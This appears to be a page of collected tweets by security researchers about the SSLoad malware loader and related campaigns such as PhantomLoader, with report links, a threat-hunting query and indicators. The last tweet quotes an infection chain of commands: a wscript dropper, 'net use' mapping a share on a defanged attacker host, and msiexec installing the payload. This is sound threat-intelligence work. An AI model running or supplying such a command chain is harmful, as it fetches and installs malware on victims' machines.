Top Tweets for #SSLoad
#ThreatProtection A Recent #PhantomLoader Campaign Delivering #SSLoad. Read more: https://t.co/U5rVoEp2cb #CyberSecurity #Malware
@RussianPanda9xx @anyrun_app check out my latest blog post on #ssload and #PhantomLoader
https://t.co/477MPNCUnB
Did you know #ssload sends a POST request to "<IP>/api/gateway" to register the infected device?
You can leverage @anyrun_app Threat Intelligence tool to hunt for ssload using a simple query: url:"api/gateway"

I investigated and analyzed an undocumented loader, #PhantomLoader, disguised as legitimate software to deliver second-stage malware. Please check it out and let me know your thoughts.
#malware
#ssload
#ThreatIntelligence
🚨 The new malware #PhantomLoader, disguised as a 360 Total Security module, is being used to spread #SSLoad
Discover detailed technical analysis of the attack chain and both malware families by @BlueEye46572843 🔍
Read and get IOCs 👇
https://t.co/AYhXXuksQn

#SSLoad is gaining popularity among threat actors. Last seen during the #FROZENSHADOW campaign, the Rust-based loader shows a different delivery method: phishing docx -> embedded XML with encoded JS -> PE -> SSLoad. Report: https://t.co/JF8Yz7kuOf
#malware #sandbox #phishing

#Researchers #Detail #Multistage #Attack #Hijacking #Systems with #SSLoad, #Cobalt #Strike
https://t.co/uX5xF9cFeI
#Researchers #Detail #Multistage #Attack #Hijacking #Systems with #SSLoad, #Cobalt #Strike
https://t.co/uX5xF9c7pa
2024-04-18 (Thursday): #SSLoad infection leads to #CobaltStrike DLL. In this case we saw no follow-up Cobalt Strike C2 traffic. List of indicators available at https://t.co/xfFA8vnHvX
#TimelyThreatIntel #Unit42ThreatIntel #Wireshark #InfectionAnalysis

2024-04-15 (Monday): #ContactForms campaign pushing #SSLoad malware as early as Thursday, 2024-04-11. List of indicators available at https://t.co/MLr80TUH73
#Wirshark #Unit42ThreatIntel #TimelyThreatIntel #InfectionTraffic

Cryptolaemus1: #SSLoad - #TA578 - url > .js > smb > .msi
wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js
net use A: \\krd6.]com@80\share\ /persistent:no
msiexec.exe /I avp.msi
msiexec.exe /V
(1/3) 👇
IOC's
https://t.co/GxaK7SIzwx https://t.co/7rI3tqe2wZ


